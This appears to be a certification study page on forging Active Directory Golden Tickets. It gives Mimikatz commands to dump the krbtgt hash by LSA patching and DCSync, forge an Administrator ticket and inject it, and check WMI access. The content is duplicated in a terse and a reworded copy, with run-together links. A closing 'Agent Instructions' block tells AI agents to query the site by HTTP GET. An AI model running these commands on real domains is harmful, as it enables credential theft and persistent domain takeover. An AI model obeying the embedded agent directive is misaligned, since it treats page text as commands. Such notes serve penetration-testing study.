# Golden tickets ### **ump hashes - Get the krbtgt hash** ``` Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername ``` ### **Make golden ticket** Use /ticket instead of /ptt to save the ticket to file instead of loading in current powershell process To get the SID use `Get-DomainSID` from powerview {% code overflow="wrap" %} ``` Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain: /sid: /krbtgt: id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' ``` {% endcode %} ### **Use the DCSync feature for getting krbtgt hash. Execute with DA privileges** ``` Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"' ``` ### **Check WMI Permission** ``` Get-wmiobject -Class win32_operatingsystem -ComputerName ``` ### Read All information about Golden Tickets - Theory and Practice
Commands: https://gitbook.ad-attacks.com/domain-persistence/golden-tickethttps://gitbook.ad-attacks.com/domain-persistence/golden-ticket/files/7Jb9zkUhmSehw46ht3PX
All About Active Directory HackingGolden Tickets Theoryhttps://ad-attacks.com//files/F4kDsDzvMEjYFUYW595U
#### Extract krbtgt hash using Mimikatz To retrieve the krbtgt account hash which is essential for creating Golden Tickets, use the following command on a target machine with appropriate permissions: ```powershell Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername ``` #### Generating a Golden Ticket After obtaining the necessary krbtgt hash and domain SID, a Golden Ticket can be created. The command below will generate and automatically pass the ticket to the session: ```powershell Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain: /sid: /krbtgt: id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' ``` To save the ticket to a file instead of loading it into the current process, replace `/ptt` with `/ticket`. #### Acquire krbtgt hash via DCSync For users with Domain Administrator privileges, the krbtgt hash can also be obtained by simulating a Domain Controller synchronization process: ```powershell Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"' ``` #### Verify WMI Permissions To check the Windows Management Instrumentation (WMI) permissions on a specific computer, use the following PowerShell command: ```powershell Get-wmiobject -Class win32_operatingsystem -ComputerName ``` #### Understanding Golden Tickets Deepening your knowledge of Active Directory attacks, specifically Golden Tickets, is crucial. Study the theory and practice through the resource provided below: * Active Directory Hacking Guide * Golden Ticket Concepts * Detailed Commands: [AD Attacks GitBook](https://gitbook.ad-attacks.com/domain-persistence/golden-ticket) ### Sources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://crtp-certification.certs-study.com/domain-persistence/golden-tickets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.